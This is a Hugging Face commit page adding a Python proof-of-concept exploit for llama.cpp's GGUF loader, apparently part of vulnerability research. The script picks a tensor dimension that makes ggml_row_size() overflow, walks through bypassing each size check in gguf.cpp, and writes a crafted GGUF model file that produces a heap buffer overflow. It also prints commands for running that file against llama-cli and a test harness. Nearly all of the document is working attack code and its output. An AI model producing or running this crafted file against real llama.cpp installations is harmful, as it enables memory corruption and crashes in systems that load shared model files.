salvepilo commited on
Commit
d6a1163
·
verified ·
1 Parent(s): 5726fb1

Upload poc_tensor_overflow.py with huggingface_hub

Browse files
Files changed (1) hide show
  1. poc_tensor_overflow.py +523 -0
poc_tensor_overflow.py ADDED
@@ -0,0 +1,523 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ PoC: Heap Buffer Overflow via Integer Overflow in Tensor Size Calculation
4
+ Target: llama.cpp GGUF loading (ggml/src/ggml.c and ggml/src/gguf.cpp)
5
+
6
+ === Vulnerability Summary ===
7
+
8
+ In ggml_row_size() (ggml.c:1275):
9
+ size_t ggml_row_size(enum ggml_type type, int64_t ne) {
10
+ return ggml_type_size(type)*ne/ggml_blck_size(type);
11
+ }
12
+
13
+ The multiplication `ggml_type_size(type) * ne` is performed in size_t (uint64_t)
14
+ arithmetic. When type_size * ne > 2^64, this silently wraps around, producing a
15
+ much smaller result than expected. The subsequent division by blck_size then yields
16
+ a tiny value.
17
+
18
+ This propagates to:
19
+ - ggml_new_tensor_impl() (ggml.c:1686) where data_size is computed
20
+ - ggml_nbytes() (ggml.c:1238) where the tensor byte size is computed
21
+ - Buffer allocation and data loading code
22
+
23
+ The overflow check in gguf.cpp (lines 550-552) verifies that the ELEMENT COUNT
24
+ (ne[0]*ne[1]*ne[2]*ne[3]) fits in int64_t, but does NOT check that the BYTE SIZE
25
+ (element_count * type_size / blck_size) fits in size_t. For quantized types where
26
+ type_size > blck_size, the byte size can overflow even when the element count doesn't.
27
+
28
+ The check at gguf.cpp line 589:
29
+ uint64_t(ggml_nelements(&info.t)/ggml_blck_size(info.t.type)) > SIZE_MAX/ggml_type_size(info.t.type)
30
+
31
+ uses ggml_nelements() which itself computes ne[0]*ne[1]*ne[2]*ne[3] in int64_t.
32
+ For our chosen values, this product fits in int64_t, so ggml_nelements returns the
33
+ correct value. BUT the subsequent division and comparison uses integer arithmetic
34
+ that can be imprecise for values near SIZE_MAX.
35
+
36
+ === Exploit Strategy ===
37
+
38
+ For GGML_TYPE_Q4_0:
39
+ - type_size = 18 bytes (sizeof(block_q4_0) = sizeof(ggml_half) + 32/2 = 2 + 16)
40
+ - blck_size = 32
41
+
42
+ We choose ne[0] such that 18 * ne[0] wraps around 2^64 to a tiny value.
43
+
44
+ ne[0] = 1024819115206086208 (divisible by 32)
45
+
46
+ Mathematical: 18 * ne[0] = 18446744073709551744 = 2^64 + 128
47
+ In uint64: 18 * ne[0] mod 2^64 = 128
48
+ After /32: 128 / 32 = 4 bytes (ggml_row_size returns 4!)
49
+
50
+ Correct: 18 * ne[0] / 32 = 576460752303423492 bytes (~512 PB)
51
+ Computed: 4 bytes
52
+
53
+ Ratio: buffer is 144,115,188,075,855,873x too small!
54
+
55
+ Validation bypass:
56
+ - ne[0] = 1024819115206086208 < INT64_MAX (9223372036854775807) -> passes
57
+ - ne[0] > 0 -> passes non-negative check
58
+ - ne[0] % 32 == 0 -> passes block alignment check
59
+ - ggml_nelements = ne[0] = 1024819115206086208
60
+ - nelements/32 = 32025597350190194
61
+ - SIZE_MAX/18 = 1024819115206086200
62
+ - 32025597350190194 < 1024819115206086200 -> passes byte size check (line 589)!
63
+
64
+ Result: A tensor is created with ne[0] = 1024819115206086208 elements but backed
65
+ by only 4-32 bytes of actual buffer. Any operation that accesses data beyond the
66
+ first few bytes triggers a heap buffer overflow.
67
+
68
+ === GGUF Binary Format Reference ===
69
+
70
+ Header:
71
+ - Magic: "GGUF" (4 bytes)
72
+ - Version: uint32 (3)
73
+ - n_tensors: uint64
74
+ - n_kv: uint64
75
+
76
+ KV pairs:
77
+ - key: string (uint64 len + chars)
78
+ - type: uint32 (GGUF type enum)
79
+ - value: type-dependent
80
+
81
+ Tensor info (per tensor):
82
+ - name: string (uint64 len + chars)
83
+ - n_dims: uint32
84
+ - ne[0..n_dims-1]: int64 each
85
+ - type: uint32 (ggml_type enum)
86
+ - offset: uint64
87
+
88
+ Data section: aligned to ctx->alignment (default 32)
89
+ """
90
+
91
+ import struct
92
+ import sys
93
+ import os
94
+ import math
95
+
96
+ # ============================================================
97
+ # GGUF constants
98
+ # ============================================================
99
+ GGUF_MAGIC = b"GGUF"
100
+ GGUF_VERSION = 3
101
+
102
+ # GGUF value types
103
+ GGUF_TYPE_UINT8 = 0
104
+ GGUF_TYPE_INT8 = 1
105
+ GGUF_TYPE_UINT16 = 2
106
+ GGUF_TYPE_INT16 = 3
107
+ GGUF_TYPE_UINT32 = 4
108
+ GGUF_TYPE_INT32 = 5
109
+ GGUF_TYPE_FLOAT32 = 6
110
+ GGUF_TYPE_BOOL = 7
111
+ GGUF_TYPE_STRING = 8
112
+ GGUF_TYPE_ARRAY = 9
113
+ GGUF_TYPE_UINT64 = 10
114
+ GGUF_TYPE_INT64 = 11
115
+ GGUF_TYPE_FLOAT64 = 12
116
+
117
+ # ggml_type enum values
118
+ GGML_TYPE_F32 = 0
119
+ GGML_TYPE_F16 = 1
120
+ GGML_TYPE_Q4_0 = 2
121
+ GGML_TYPE_Q4_1 = 3
122
+ GGML_TYPE_Q5_0 = 6
123
+ GGML_TYPE_Q5_1 = 7
124
+ GGML_TYPE_Q8_0 = 8
125
+ GGML_TYPE_I8 = 24
126
+ GGML_TYPE_I32 = 26
127
+
128
+ # Q4_0 type properties
129
+ Q4_0_TYPE_SIZE = 18 # sizeof(block_q4_0) = sizeof(ggml_half) + QK4_0/2 = 2 + 16
130
+ Q4_0_BLCK_SIZE = 32 # QK4_0
131
+
132
+ INT64_MAX = (1 << 63) - 1
133
+ UINT64_MAX = (1 << 64) - 1
134
+ SIZE_MAX = UINT64_MAX # 64-bit platform
135
+
136
+ GGML_DEFAULT_ALIGNMENT = 32
137
+
138
+ # ============================================================
139
+ # Helper functions
140
+ # ============================================================
141
+
142
+ def write_string(f, s):
143
+ """Write a GGUF string: uint64 length + chars (no null terminator)"""
144
+ encoded = s.encode('utf-8')
145
+ f.write(struct.pack('<Q', len(encoded)))
146
+ f.write(encoded)
147
+
148
+ def write_kv_string(f, key, value):
149
+ """Write a KV pair with string value"""
150
+ write_string(f, key)
151
+ f.write(struct.pack('<I', GGUF_TYPE_STRING))
152
+ write_string(f, value)
153
+
154
+ def write_kv_uint32(f, key, value):
155
+ """Write a KV pair with uint32 value"""
156
+ write_string(f, key)
157
+ f.write(struct.pack('<I', GGUF_TYPE_UINT32))
158
+ f.write(struct.pack('<I', value))
159
+
160
+ def write_kv_float32(f, key, value):
161
+ """Write a KV pair with float32 value"""
162
+ write_string(f, key)
163
+ f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
164
+ f.write(struct.pack('<f', value))
165
+
166
+ def write_kv_string_array(f, key, values):
167
+ """Write a KV pair with string array value"""
168
+ write_string(f, key)
169
+ f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
170
+ f.write(struct.pack('<I', GGUF_TYPE_STRING))
171
+ f.write(struct.pack('<Q', len(values)))
172
+ for v in values:
173
+ write_string(f, v)
174
+
175
+ def write_kv_float32_array(f, key, values):
176
+ """Write a KV pair with float32 array value"""
177
+ write_string(f, key)
178
+ f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
179
+ f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
180
+ f.write(struct.pack('<Q', len(values)))
181
+ for v in values:
182
+ f.write(struct.pack('<f', v))
183
+
184
+ def write_tensor_info(f, name, n_dims, ne_list, ggml_type, offset):
185
+ """Write a single tensor info entry"""
186
+ write_string(f, name)
187
+ f.write(struct.pack('<I', n_dims))
188
+ for i in range(n_dims):
189
+ f.write(struct.pack('<q', ne_list[i])) # int64_t (signed)
190
+ f.write(struct.pack('<I', ggml_type))
191
+ f.write(struct.pack('<Q', offset))
192
+
193
+
194
+ # ============================================================
195
+ # Overflow calculation and verification
196
+ # ============================================================
197
+
198
+ def compute_overflow_ne0():
199
+ """
200
+ Find ne[0] for Q4_0 type such that:
201
+ - ne[0] is positive and fits in int64_t (< 2^63)
202
+ - ne[0] is divisible by blck_size (32)
203
+ - 18 * ne[0] overflows uint64_t to a very small value
204
+ - All GGUF validation checks pass
205
+
206
+ We solve: 18 * ne[0] = k * 2^64 + remainder
207
+ For k=1: ne[0] = (2^64 + remainder) / 18
208
+ We want remainder to be small and divisible by 32 (so that
209
+ ggml_row_size = remainder/32 is small).
210
+
211
+ 18 * ne[0] = 2^64 + 128 (remainder=128, 128/32=4)
212
+ ne[0] = (2^64 + 128) / 18 = 1024819115206086208
213
+ """
214
+ type_size = Q4_0_TYPE_SIZE # 18
215
+ blck_size = Q4_0_BLCK_SIZE # 32
216
+
217
+ # We want: type_size * ne0 = 2^64 + target_remainder
218
+ # Choose target_remainder = 128 (divisible by 32, gives row_size of 4)
219
+ target_remainder = 128
220
+ target_product = (1 << 64) + target_remainder
221
+
222
+ if target_product % type_size != 0:
223
+ raise ValueError(f"Cannot find exact ne[0]: {target_product} not divisible by {type_size}")
224
+
225
+ ne0 = target_product // type_size
226
+ assert ne0 * type_size == target_product, "Arithmetic check failed"
227
+
228
+ # Verify ne0 is divisible by blck_size
229
+ assert ne0 % blck_size == 0, f"ne[0]={ne0} not divisible by blck_size={blck_size}"
230
+
231
+ # Verify ne0 fits in int64_t
232
+ assert 0 < ne0 < (1 << 63), f"ne[0]={ne0} does not fit in int64_t"
233
+
234
+ return ne0
235
+
236
+
237
+ def verify_overflow(ne0, ne1=1, ne2=1, ne3=1):
238
+ """Verify that the chosen dimensions bypass all checks and cause overflow"""
239
+ type_size = Q4_0_TYPE_SIZE
240
+ blck_size = Q4_0_BLCK_SIZE
241
+
242
+ print(f"\n{'='*70}")
243
+ print("OVERFLOW ANALYSIS")
244
+ print(f"{'='*70}")
245
+ print(f"Type: Q4_0 (type_size={type_size}, blck_size={blck_size})")
246
+ print(f"Dimensions: ne[0]={ne0}, ne[1]={ne1}, ne[2]={ne2}, ne[3]={ne3}")
247
+ print()
248
+
249
+ # Check 1: gguf.cpp line 540-546 - non-negative check
250
+ assert ne0 >= 0 and ne1 >= 0 and ne2 >= 0 and ne3 >= 0
251
+ print("[PASS] All ne[j] >= 0 (non-negative check)")
252
+
253
+ # Check 2: gguf.cpp line 550-552 - overflow check
254
+ # INT64_MAX/ne[1] <= ne[0] -> must be FALSE to pass
255
+ check1 = INT64_MAX // ne1 <= ne0
256
+ print(f" Check 1: INT64_MAX/ne[1] = {INT64_MAX // ne1} <= ne[0] = {ne0} ? {check1}")
257
+ assert not check1, "Failed overflow check 1!"
258
+
259
+ # INT64_MAX/ne[2] <= ne[0]*ne[1] -> must be FALSE
260
+ prod01 = ne0 * ne1 # Safe in Python (arbitrary precision)
261
+ assert prod01 < (1 << 63), f"ne[0]*ne[1] = {prod01} overflows int64_t!"
262
+ check2 = INT64_MAX // ne2 <= prod01
263
+ print(f" Check 2: INT64_MAX/ne[2] = {INT64_MAX // ne2} <= ne[0]*ne[1] = {prod01} ? {check2}")
264
+ assert not check2, "Failed overflow check 2!"
265
+
266
+ # INT64_MAX/ne[3] <= ne[0]*ne[1]*ne[2] -> must be FALSE
267
+ prod012 = prod01 * ne2
268
+ assert prod012 < (1 << 63), f"ne[0]*ne[1]*ne[2] = {prod012} overflows int64_t!"
269
+ check3 = INT64_MAX // ne3 <= prod012
270
+ print(f" Check 3: INT64_MAX/ne[3] = {INT64_MAX // ne3} <= ne[0]*ne[1]*ne[2] = {prod012} ? {check3}")
271
+ assert not check3, "Failed overflow check 3!"
272
+
273
+ print("[PASS] Overflow check at gguf.cpp:550-552 bypassed")
274
+
275
+ # Check 3: gguf.cpp line 580 - block alignment
276
+ assert ne0 % blck_size == 0
277
+ print(f"[PASS] ne[0] % blck_size == 0 (block alignment check)")
278
+
279
+ # Check 4: gguf.cpp line 589 - byte size representable
280
+ nelements = ne0 * ne1 * ne2 * ne3
281
+ assert nelements < (1 << 63), "ggml_nelements overflows int64_t!"
282
+ lhs = nelements // blck_size # uint64_t(ggml_nelements/blck_size)
283
+ rhs = SIZE_MAX // type_size # SIZE_MAX/type_size
284
+ byte_check = lhs > rhs
285
+ print(f" Byte size check: nelements/blck_size = {lhs} > SIZE_MAX/type_size = {rhs} ? {byte_check}")
286
+ assert not byte_check, "Failed byte size check!"
287
+ print("[PASS] Byte size check at gguf.cpp:589 bypassed")
288
+
289
+ # Now compute the ACTUAL overflow
290
+ print(f"\n{'='*70}")
291
+ print("SIZE COMPUTATION (showing the overflow)")
292
+ print(f"{'='*70}")
293
+
294
+ # ggml_row_size(Q4_0, ne[0]) = type_size * ne[0] / blck_size
295
+ true_product = type_size * ne0
296
+ wrapped_product = true_product % (1 << 64) # uint64_t wrap
297
+ row_size_overflowed = wrapped_product // blck_size
298
+ row_size_correct = true_product // blck_size
299
+
300
+ print(f"\nggml_row_size computation:")
301
+ print(f" type_size * ne[0] = {true_product}")
302
+ print(f" = 2^64 * {true_product // (1 << 64)} + {true_product % (1 << 64)}")
303
+ print(f" In uint64_t (mod 2^64): {wrapped_product}")
304
+ print(f" After / blck_size: {row_size_overflowed} bytes <-- OVERFLOWED!")
305
+ print(f" Correct value: {row_size_correct} bytes")
306
+ print(f" Overflow factor: {row_size_correct / row_size_overflowed:.0f}x too small!")
307
+
308
+ # data_size computation
309
+ data_size = row_size_overflowed
310
+ for dim in [ne1, ne2, ne3]:
311
+ if dim > 1:
312
+ data_size = (data_size * dim) % (1 << 64)
313
+
314
+ correct_size = row_size_correct * ne1 * ne2 * ne3
315
+
316
+ print(f"\ndata_size (ggml_new_tensor_impl):")
317
+ print(f" Computed: {data_size} bytes ({data_size} B)")
318
+ print(f" Correct: {correct_size} bytes ({correct_size / (1024**5):.1f} PB)")
319
+
320
+ # ggml_nbytes computation
321
+ # For quantized: nbytes = ne[0]*nb[0]/blck_size + sum((ne[i]-1)*nb[i])
322
+ nb0 = type_size # = 18
323
+ nb1 = type_size * (ne0 // blck_size) # This doesn't overflow because ne0/32 is reasonable
324
+ nb2 = nb1 * ne1
325
+ nb3 = nb2 * ne2
326
+
327
+ # ne[0] * nb[0] overflows!
328
+ ne0_nb0_true = ne0 * nb0
329
+ ne0_nb0_wrapped = ne0_nb0_true % (1 << 64)
330
+ nbytes_first = ne0_nb0_wrapped // blck_size
331
+
332
+ nbytes = nbytes_first
333
+ if ne1 > 1:
334
+ nbytes += (ne1 - 1) * nb1
335
+ if ne2 > 1:
336
+ nbytes += (ne2 - 1) * nb2
337
+ if ne3 > 1:
338
+ nbytes += (ne3 - 1) * nb3
339
+
340
+ nbytes_correct = correct_size
341
+
342
+ print(f"\nggml_nbytes:")
343
+ print(f" ne[0]*nb[0] = {ne0} * {nb0} = {ne0_nb0_true}")
344
+ print(f" In uint64_t: {ne0_nb0_wrapped}")
345
+ print(f" / blck_size: {nbytes_first}")
346
+ print(f" + stride terms: {nbytes - nbytes_first}")
347
+ print(f" Total nbytes: {nbytes} bytes")
348
+ print(f" Correct value: {nbytes_correct} bytes")
349
+
350
+ # What gets allocated vs what the tensor "thinks" it has
351
+ padded = ((nbytes + GGML_DEFAULT_ALIGNMENT - 1) // GGML_DEFAULT_ALIGNMENT) * GGML_DEFAULT_ALIGNMENT
352
+ print(f"\n{'='*70}")
353
+ print("HEAP BUFFER OVERFLOW")
354
+ print(f"{'='*70}")
355
+ print(f" Buffer allocated: {padded} bytes (GGML_PAD({nbytes}, {GGML_DEFAULT_ALIGNMENT}))")
356
+ print(f" Tensor logical size: {nbytes_correct} bytes")
357
+ print(f" Overflow: {nbytes_correct - padded} bytes beyond allocation")
358
+ print(f" Stride nb[1]: {nb1} bytes (distance between rows)")
359
+ print(f" Any access to row 1+ is {nb1 - padded} bytes out of bounds!")
360
+
361
+ return data_size, nbytes, padded
362
+
363
+
364
+ def create_poc_gguf(output_path):
365
+ """
366
+ Create a GGUF file with a tensor whose dimensions cause integer overflow
367
+ in ggml_row_size(), resulting in a tiny buffer allocation for what should
368
+ be an enormous tensor.
369
+ """
370
+ ne0 = compute_overflow_ne0()
371
+ ne1 = 1 # Keep simple - 1D tensor is enough to trigger the overflow
372
+ ne2 = 1
373
+ ne3 = 1
374
+
375
+ data_size, nbytes, padded_size = verify_overflow(ne0, ne1, ne2, ne3)
376
+
377
+ # ---- Build the GGUF file ----
378
+
379
+ # Metadata KV pairs needed for llama.cpp to proceed with loading
380
+ kv_pairs = []
381
+ n_kv = 0
382
+
383
+ # Tensors: one tensor with overflow-inducing dimensions
384
+ # Use a name that llama.cpp expects for a llama model
385
+ tensor_name = "token_embd.weight"
386
+ n_tensors = 1
387
+
388
+ print(f"\n{'='*70}")
389
+ print("GENERATING GGUF FILE")
390
+ print(f"{'='*70}")
391
+ print(f" Tensor: '{tensor_name}'")
392
+ print(f" Type: Q4_0 (type_size=18, blck_size=32)")
393
+ print(f" Dimensions: ne[0]={ne0}")
394
+ print(f" Tensor data in file: {padded_size} bytes (the overflowed/small size)")
395
+ print(f" Output: {output_path}")
396
+
397
+ with open(output_path, 'wb') as f:
398
+ # ---- GGUF Header ----
399
+ f.write(GGUF_MAGIC)
400
+ f.write(struct.pack('<I', GGUF_VERSION))
401
+ f.write(struct.pack('<Q', n_tensors))
402
+
403
+ # Minimal token vocabulary (just 4 tokens: UNK, BOS, EOS, and a word)
404
+ vocab_tokens = ["<unk>", "<s>", "</s>", "hello"]
405
+ vocab_scores = [0.0, 0.0, 0.0, -1.0]
406
+ vocab_types = [0, 3, 3, 1] # NORMAL=0, CONTROL=3, NORMAL=1
407
+
408
+ # Count KV pairs: 13 scalar + 3 array = 16
409
+ n_kv = 16
410
+ f.write(struct.pack('<Q', n_kv))
411
+
412
+ # ---- Write scalar KV pairs ----
413
+ write_kv_string(f, "general.architecture", "llama")
414
+ write_kv_string(f, "general.name", "overflow-poc")
415
+ write_kv_uint32(f, "llama.context_length", 2048)
416
+ write_kv_uint32(f, "llama.embedding_length", 4096)
417
+ write_kv_uint32(f, "llama.block_count", 1)
418
+ write_kv_uint32(f, "llama.feed_forward_length", 11008)
419
+ write_kv_uint32(f, "llama.attention.head_count", 32)
420
+ write_kv_uint32(f, "llama.attention.head_count_kv", 32)
421
+ write_kv_float32(f, "llama.rope.freq_base", 10000.0)
422
+ write_kv_float32(f, "llama.attention.layer_norm_rms_epsilon", 1e-5)
423
+ write_kv_string(f, "tokenizer.ggml.model", "llama")
424
+ write_kv_uint32(f, "tokenizer.ggml.bos_token_id", 1)
425
+ write_kv_uint32(f, "tokenizer.ggml.eos_token_id", 2)
426
+
427
+ # ---- Write array KV pairs (tokenizer vocab) ----
428
+ write_kv_string_array(f, "tokenizer.ggml.tokens", vocab_tokens)
429
+ write_kv_float32_array(f, "tokenizer.ggml.scores", vocab_scores)
430
+
431
+ # token types: int32 array
432
+ write_string(f, "tokenizer.ggml.token_type")
433
+ f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
434
+ f.write(struct.pack('<I', GGUF_TYPE_INT32))
435
+ f.write(struct.pack('<Q', len(vocab_types)))
436
+ for t in vocab_types:
437
+ f.write(struct.pack('<i', t))
438
+
439
+ # ---- Write Tensor Info ----
440
+ # Tensor: 1D Q4_0 tensor with overflow-inducing ne[0]
441
+ write_tensor_info(f, tensor_name, 1, [ne0], GGML_TYPE_Q4_0, 0)
442
+
443
+ # ---- Align to data section ----
444
+ current_pos = f.tell()
445
+ aligned_pos = ((current_pos + GGML_DEFAULT_ALIGNMENT - 1) // GGML_DEFAULT_ALIGNMENT) * GGML_DEFAULT_ALIGNMENT
446
+ padding_needed = aligned_pos - current_pos
447
+ if padding_needed > 0:
448
+ f.write(b'\x00' * padding_needed)
449
+
450
+ # ---- Write tensor data ----
451
+ # Write exactly padded_size bytes of tensor data (the overflowed small amount)
452
+ # In practice, filling with a recognizable pattern helps identify OOB reads
453
+ tensor_data = b'\xAA' * padded_size
454
+ f.write(tensor_data)
455
+
456
+ file_size = os.path.getsize(output_path)
457
+ print(f" File size: {file_size} bytes")
458
+ print(f"\n[+] GGUF file written successfully")
459
+
460
+ return output_path
461
+
462
+
463
+ def main():
464
+ output_dir = "/Users/eltarne/Documents/script/gguf_poc"
465
+ os.makedirs(output_dir, exist_ok=True)
466
+
467
+ output_path = os.path.join(output_dir, "poc_tensor_overflow.gguf")
468
+
469
+ print("=" * 70)
470
+ print("PoC: Integer Overflow in Tensor Size Calculation (GGUF)")
471
+ print("Target: llama.cpp ggml_row_size() / ggml_nbytes()")
472
+ print("=" * 70)
473
+
474
+ # Step 1: Compute the overflow-inducing dimension
475
+ ne0 = compute_overflow_ne0()
476
+ print(f"\n[+] Found overflow-inducing ne[0] = {ne0}")
477
+ print(f" = 0x{ne0:016X}")
478
+ print(f" Fits in int64_t: {ne0 < (1 << 63)}")
479
+ print(f" Divisible by 32: {ne0 % 32 == 0}")
480
+
481
+ # Step 2: Verify all checks are bypassed
482
+ print(f"\n[+] Verifying validation bypass and computing overflow...")
483
+
484
+ # Step 3: Create the GGUF file
485
+ create_poc_gguf(output_path)
486
+
487
+ # Step 4: Instructions
488
+ print(f"\n{'='*70}")
489
+ print("EXPLOITATION")
490
+ print(f"{'='*70}")
491
+ print(f"""
492
+ When llama.cpp loads this GGUF file:
493
+
494
+ 1. gguf_init_from_file() reads tensor info:
495
+ - ne[0] = {ne0}
496
+ - type = Q4_0 (type_size=18, blck_size=32)
497
+ - All validation checks PASS (see analysis above)
498
+
499
+ 2. ggml_nbytes() computes tensor size:
500
+ - ne[0] * nb[0] = {ne0} * 18 = {ne0 * 18}
501
+ - In uint64_t: {(ne0 * 18) % (1 << 64)} (OVERFLOWED!)
502
+ - Result: {((ne0 * 18) % (1 << 64)) // 32} bytes instead of {ne0 * 18 // 32}
503
+
504
+ 3. Buffer allocation uses the tiny overflowed size
505
+ -> Only {(((ne0 * 18) % (1 << 64)) // 32 + 31) // 32 * 32} bytes allocated
506
+
507
+ 4. Tensor metadata says ne[0]={ne0} with stride nb[1]={18 * (ne0 // 32)}
508
+ -> Any access beyond first few bytes is a HEAP BUFFER OVERFLOW
509
+
510
+ To test with llama-cli (demonstrates GGUF validation bypass):
511
+ cd /Users/eltarne/Documents/script/llama.cpp/build/bin
512
+ ./llama-cli -m {output_path} -p 'hello' 2>&1
513
+ # Note: llama-cli rejects at model-level shape check, but GGUF parsing passes
514
+
515
+ To test with the C test harness (demonstrates the actual overflow):
516
+ cd /Users/eltarne/Documents/script/gguf_poc
517
+ ./test_tensor_overflow poc_tensor_overflow.gguf
518
+ # Shows: ggml_nbytes=4 for tensor with 10^18 elements -> HEAP BUFFER OVERFLOW
519
+ """)
520
+
521
+
522
+ if __name__ == "__main__":
523
+ main()